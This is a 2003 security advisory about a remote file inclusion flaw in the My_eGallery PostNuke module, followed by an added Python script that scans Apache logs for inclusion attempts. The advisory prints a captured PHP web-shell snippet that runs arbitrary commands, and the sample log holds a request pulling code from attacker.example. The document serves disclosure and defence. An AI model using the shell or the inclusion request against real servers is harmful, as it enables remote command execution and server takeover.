[UNIX] My_eGallery Code Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 11/27/03

    To: list@securiteam.com
    Date: 27 Nov 2003 11:34:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      My_eGallery Code Injection
    ------------------------------------------------------------------------

    SUMMARY

    My_eGallery (http://lottasophie.sourceforge.net/index.php) is "a very
    nice PostNuke module, which allows users to create and manipulate their
    own galleries on the web, plus offers various additional features". A
    vulnerability in the product allows remote attackers to inject code and
    cause it to execute under the privileges My_eGallery runs under.

    DETAILS

    Vulnerable systems:
     * My_eGallery version 3.1.1.f and prior

    Immune systems:
     * My_eGallery version 3.1.1.g

    Several of the product's PHP files pass request parameters to include
    functions without filtering them. An intruder can host PHP code on their
    own Web site and supply its URL as such a parameter, so that My_eGallery
    includes and executes the malicious PHP code.

    The following code was captured as being used in the wild (edited
    intentionally):
    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      print_output();
    ?>

    This allows execution of arbitrary commands on the server hosting
    My_eGallery, under the privileges of the Web server (usually apache or
    httpd).
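    As an added defender-side example (not part of this advisory or of the
    My_eGallery project), the following Python scans Apache access-log lines
    for the signature of the attack described above: a query parameter whose
    value is a URL, i.e. a remote file inclusion attempt. The log lines,
    hostnames and the parameter name "param" are constructed; the advisory
    does not name the vulnerable parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format). The IPs,
# hostnames and the parameter name "param" are placeholders, not the real
# My_eGallery parameter, which the advisory does not name.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Nov/2003:11:34:33 +0200] "GET /modules.php?op=modload&name=My_eGallery&file=index HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [27/Nov/2003:11:35:01 +0200] "GET /modules.php?op=modload&name=My_eGallery&param=http%3A%2F%2Fattacker.example%2Finc.txt%3F&cmd=id HTTP/1.1" 200 312 "-" "Mozilla/4.0"
10.0.0.7 - - [27/Nov/2003:11:36:10 +0200] "GET /modules.php?op=modload&name=News&file=article&sid=12 HTTP/1.1" 200 8000 "-" "Mozilla/4.0"
"""

# Fields of the combined log format that the check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that starts with a URL scheme is the tell-tale of an
# attempt to make include() fetch code from a remote host.
REMOTE_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, value) for every request in which a
    query parameter carries a URL, the signature of a remote-include attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-format line
        query = urlsplit(m.group('target')).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl already decodes percent-encoding once; decode again
            # so a double-encoded URL does not slip past the check.
            if REMOTE_RE.match(unquote(value)):
                hits.append((m.group('ip'), key, value))
    return hits


if __name__ == '__main__':
    for ip, key, value in find_rfi_attempts(SAMPLE_LOG):
        print(f'{ip}: parameter {key!r} carries remote URL {value!r}')
```

    Running it over the sample flags only the second line, where "param"
    points at a remote host; a real deployment would feed it the live
    access log and alert on any hit against the My_eGallery module.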

    Solution:
    The vendor was contacted and promptly replied. A fix is available at the
    vendor's site:
    http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

    As this was seen being exploited in the wild, users are urged to upgrade
    to the latest version as soon as possible.

    ADDITIONAL INFORMATION

    The information has been provided by Bojan Zdrnja (Bojan.Zdrnja@LSS.hr).


